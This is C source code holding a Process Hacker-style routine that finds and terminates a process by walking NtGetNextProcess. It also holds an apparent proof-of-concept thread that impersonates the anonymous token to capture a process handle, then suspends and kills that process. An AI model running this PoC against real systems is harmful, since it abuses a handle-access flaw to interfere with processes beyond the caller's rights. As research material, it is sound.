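/**
 * Terminator "TP1a": locate the target process by walking the process list
 * with NtGetNextProcess and terminate it through the handle that walk yields.
 *
 * Every handle is requested with ProcessQueryAccess | PROCESS_TERMINATE, so
 * the PID can be read via PhGetProcessBasicInformation and the process can be
 * killed via PhTerminateProcess on the very same handle.
 *
 * @param ProcessId  Process ID of the process to terminate (as a HANDLE).
 * @return STATUS_NOT_SUPPORTED if NtGetNextProcess is not available;
 *         the NtGetNextProcess error if the walk fails before the target is
 *         reached (e.g. when the list is exhausted);
 *         STATUS_NOT_FOUND if the walk's iteration cap is hit first;
 *         otherwise the result of PhTerminateProcess.
 */
static NTSTATUS NTAPI TerminatorTP1a(
    _In_ HANDLE ProcessId
    )
{
    NTSTATUS status;
    HANDLE processHandle = NULL;
    BOOLEAN found = FALSE;
    ULONG i;

    if (!NtGetNextProcess)
        return STATUS_NOT_SUPPORTED;

    // Start the walk from the current process, as the original does.
    status = NtGetNextProcess(
        NtCurrentProcess(),
        ProcessQueryAccess | PROCESS_TERMINATE,
        0,
        0,
        &processHandle
        );

    if (!NT_SUCCESS(status))
        return status;

    // Hard cap on the walk so a misbehaving NtGetNextProcess cannot loop forever.
    for (i = 0; i < 1000; i++)
    {
        HANDLE nextProcessHandle;
        PROCESS_BASIC_INFORMATION basicInfo;

        if (NT_SUCCESS(PhGetProcessBasicInformation(processHandle, &basicInfo)) &&
            basicInfo.UniqueProcessId == ProcessId)
        {
            // Report the terminate result, not the status of the last walk step.
            status = PhTerminateProcess(processHandle, STATUS_SUCCESS);
            found = TRUE;
            break;
        }

        status = NtGetNextProcess(
            processHandle,
            ProcessQueryAccess | PROCESS_TERMINATE,
            0,
            0,
            &nextProcessHandle
            );

        // The current handle is finished with whether or not the step succeeded.
        NtClose(processHandle);
        processHandle = NULL;

        if (!NT_SUCCESS(status))
            break;

        processHandle = nextProcessHandle;
    }

    // Still open if we broke out after terminating, or if the cap was reached;
    // the original leaked the handle on both of those paths.
    if (processHandle)
        NtClose(processHandle);

    // Cap reached with the last step succeeding: the target was never seen, so
    // don't let a successful NtGetNextProcess read as a successful kill.
    if (!found && NT_SUCCESS(status))
        status = STATUS_NOT_FOUND;

    return status;
}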
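// Thread entry for the PoC: while impersonating the anonymous token, capture a
// process handle via NtGetNextProcess, suspend that process, then spawn a child
// through CreateProcessWithLogonW and finally terminate the captured process.
//
// The thread parameter is unused. g_hProcess (file scope) receives the captured
// handle; SetProcessId is a helper defined elsewhere in this file/project.
DWORD CALLBACK CaptureAndSuspendProcess(LPVOID)
{
    // Everything below depends on the capture loop running as Anonymous. If the
    // impersonation fails we would silently capture the first process our real
    // token can open, which is not the intended target — so bail out instead.
    if (!ImpersonateAnonymousToken(GetCurrentThread()))
    {
        printf("ImpersonateAnonymousToken error: %lu\n", GetLastError());
        return 1;
    }

    // Spin until NtGetNextProcess hands back a handle the anonymous token can
    // open with MAXIMUM_ALLOWED (a nullptr start handle appears to restart the
    // walk from the first process on each call, so the first openable one wins).
    while (NtGetNextProcess(nullptr, MAXIMUM_ALLOWED, 0, 0, &g_hProcess) != 0)
    {
    }

    NTSTATUS status = NtSuspendProcess(g_hProcess);
    // NTSTATUS is a LONG and DWORD an unsigned long; the specifiers must match.
    printf("Suspended process: %08lX %p %lu\n",
        (unsigned long)status, g_hProcess, GetProcessId(g_hProcess));

    RevertToSelf();
    SetProcessId(GetProcessId(g_hProcess));

    // CreateProcessWithLogonW may modify the command line, so it must be a
    // writable buffer rather than a string literal.
    WCHAR cmdline[] = L"notepad.exe";
    STARTUPINFOW startInfo = {};
    PROCESS_INFORMATION procInfo = {};
    startInfo.cb = sizeof(startInfo);

    // With LOGON_NETCREDENTIALS_ONLY the child runs under the caller's token and
    // the supplied credentials are only used for outbound network authentication
    // (documented CreateProcessWithLogonW behaviour), so these placeholder values
    // do not need to be a real account.
    if (CreateProcessWithLogonW(L"user", L"domain", L"password", LOGON_NETCREDENTIALS_ONLY,
            nullptr, cmdline, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo))
    {
        printf("Created process %lu\n", procInfo.dwProcessId);
        // The child is left suspended; we only drop our handles to it.
        CloseHandle(procInfo.hThread);
        CloseHandle(procInfo.hProcess);
    }
    else
    {
        printf("Create error: %lu\n", GetLastError());
    }

    TerminateProcess(g_hProcess, 0);
    ExitProcess(0);
    return 0;
}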